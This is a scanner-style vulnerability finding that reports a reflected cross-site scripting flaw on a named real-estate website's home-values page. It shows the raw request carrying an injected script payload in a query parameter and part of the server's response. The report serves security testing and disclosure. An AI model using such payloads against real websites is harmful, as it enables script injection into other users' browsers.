1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://www.realtor.com |
Path: | /homevalues/ |
GET /homevalues/?gate=MSN%00d1a4f"%3balert(1)/ Host: www.realtor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 04 Dec 2011 03:44:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 4.0.30319 P3P: CP='COR CURa ADMo DEVo PSAo PSDo TAIo OUR' Set-Cookie: ASP.NET_SessionId Set-Cookie: SAVEDITEMS=; domain=realtor.com; expires=Sat, 03-Dec-2011 03:44:17 GMT; path=/ Set-Cookie: VerifiedIP=17CB96888 Set-Cookie: recAlertSearch=recAl Set-Cookie: RecentSearch=loc%3dDALLAS Set-Cookie: SRP_ShownWinks=0; path=/ Set-Cookie: criteria=gate=MSN%00d1a4f Set-Cookie: wnk-srp-p=next=12967 Cache-Control: no-cache, no-store Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 131373 <!DOCTYPE html> <!--[if gt IE 8]><html lang="en" class="IE IE9 W3C"><![endif]--> <!--[if IE 8]><html lang="en" class="IE IE8 IE8-"><![endif]--> <!--[if IE 7]><html lang="en" class="IE IE7 IE67"><![ ...[SNIP]... andom()*10); var dartbasetag="RDC/FAH.SRP ...[SNIP]... |